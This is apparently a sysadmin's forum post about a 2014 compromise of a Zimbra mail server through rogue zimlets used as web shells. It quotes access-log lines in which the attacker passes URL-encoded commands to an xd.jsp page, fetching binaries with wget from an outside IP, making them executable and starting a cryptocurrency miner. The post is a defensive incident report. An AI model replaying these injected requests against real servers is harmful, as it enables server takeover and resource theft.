We have had a never ending issue with Zimbra that started months ago, and after upgrading from 7.2 all the way to 8.0.6 and it appears to still be happening.
I decided to create a new thread, because the information is segmented and took forever to find. If you are looking for more information these threads led me to the problem:
The attacker appears to be able to deploy dummy zimlets that then can be used to write attacking code to the tmp directory and execute this. Although it appears this has only been used to start a litecoin mining process on my server, this is a SEVERE security hole! The attackers could execute bots to read through user messages, the possibilities are endless.
Of course, we went through the upgrade process to make sure we patched any potential security holes, and double checked our users to make sure there were no other privileged users that could deploy zimlets.
Using information from the zimbra 0 day thread, we found the found "com_zimbra_example_simplejspaction" and "com_zimbra_example_simplejspaction2" were deployed to the zimlets directory. The first zimlet has been reported, but version "2" has not been mentioned in what I can find. These had older creation dates and appear to be the first zimlets that were causing the problem.
In looking at the log output in some of the log files in the above threads, I noticed that the command uses chmod to make sure everything is executable. So I scanned the logs:
Output (Our server IP has been redacted):
$cat access_log* | grep chmod
As you can see the most recent use of the command does not use "com_zimbra_example_simplejspaction" it uses "com_zimbra_email_dns".
22.214.171.124 - - [11/Mar/2014:04:49:27 +0000] "GET /zimlet/com_zimbra_email_dns/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb HTTP/1.1" 200 226 "https://SERVERIP/zimlet/com_zimbra_email_dns/xd.jsp?comment=wget+http%3A%2F%2F126.96.36.199%2FCFIDE%2Fb+-O+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73" 5
188.8.131.52 - - [11/Mar/2014:04:49:28 +0000] "GET /zimlet/com_zimbra_email_dns/xd.jsp?comment=%2Fvar%2Ftmp%2Fa+-B+-o+stratum%2Btcp%3A%2F%2F666.0x01-security.com%3A53+-u+ilovebigdongs.1+-p+x HTTP/1.1" 500 8427 "https://SERVERIP/zimlet/com_zimbra_email_dns/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73" 51
184.108.40.206 - - [11/Mar/2014:04:49:29 +0000] "GET /zimlet/com_zimbra_email_dns/xd.jsp?comment=%2Fvar%2Ftmp%2Fb+-B+-o+stratum%2Btcp%3A%2F%2F666.0x01-security.com%3A53+-u+ilovebigdongs.1+-p+x HTTP/1.1" 200 275 "https://SERVERIP/zimlet/com_zimbra_email_dns/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73" 6323038
It appears that the various zimlets were deployed prior to 8.0.6 but I am going to keep an eye on things to make sure they are clean.
Can someone official let us know if the exploit allowing this deployment has been patched? Since we can't get any details on the exploits that are patched, it would be great for my peace of mind.